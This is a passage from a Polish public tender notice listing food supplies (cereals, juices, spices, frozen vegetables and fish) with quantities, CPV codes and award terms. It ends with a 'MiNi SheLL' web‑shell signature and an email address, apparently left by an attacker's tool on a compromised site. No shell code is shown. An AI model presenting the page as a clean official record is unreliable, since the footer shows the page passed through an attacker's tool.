68	Płatki kuk.miodowo orzechowe zawartość błonnika nie mniejsza niż  3,0 g w 100 g produktu	kg	400
69	Paluszki słone op.100g	op.	70
70	Płatki kuk.Corn Fles z 5,0 g w 100 g produktu	kg	320
71	Płatki musli z owocami op.500g	kg	320
72	Płatki owsiane górskie op.500g	kg	40
73	Płatki zwykłe kukurydziane	kg	50
74	Pieprz czarny / nie mielony op.0,5 kg.	kg.	5
75	Pieczywo chrupkie typu Wasa żytnie op.210g opakowanie około 24 kromek	op	1 000
76	Pieczywo ryżowe 100g	szt	100
77	Proszek do pieczenia 18g	szt.	1 000
78	Rodzynki op.1kg	kg.	100
79	Ryż paraboliczny op 5kg	kg	400
80	Ryż biały paraboliczny op 1kg 	kg.	100
81	Sól morska	kg.	1 500
82	Sok smaki marchwiowo-owocowy bez cukru 0,9 L	szt.	4 000
83	soki  0,33l /op bez konserwantów	szt	1 000
84	Sok pomidorowy opak./bez konserwantów	l	50
85	Syrop pitny wysokosłodzony  420ml głóg, aronia czarna porzeczka, wiśnia. Malina bez konserwantów	szt.	600
86	Suchary bezcukrowe 285g	szt.	100
87	Soda spożywcza 100g	szt.	500
88	Słodycze bożonarodzeniowe (mikołaje 100g)	szt	250
89	Ziarno kukurydzy (popcorn)	kg.	200
90	Zioła prawensalskie 	kg	2
91	Zioło angielskie	kg	2
92	Zioła Estragon	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mrożonki owocowo-warzywne oraz rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	brokuły	kg.	100
2	Fasolka szparagowa mroż	kg.	130
3	Groszek zielony mrożony	kg.	160
4	Kalafior mrożony	kg.	170
5	Kukurydza mrożona	kg.	170
6	Mieszanka komp.4 składniki	kg.	3000
7	Papryka mrożona cięta	kg.	100
8	Szpinak 	kg.	50
9	Filet mrożony / mintaj / bez glazury	kg.	700
10	Filet mrożony /sola/ miruna/bez glazury	kg.	250
11	Filet mrożony / dorsz bez glazury	kg.	200
12	Filet marynowany śledziowy	kg.	20
13	Ryba wędzona / makrela	kg.	400
14	Truskawka mroż.	kg.	100
15	Wiśnia bez pestek mroż.	kg.	650.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com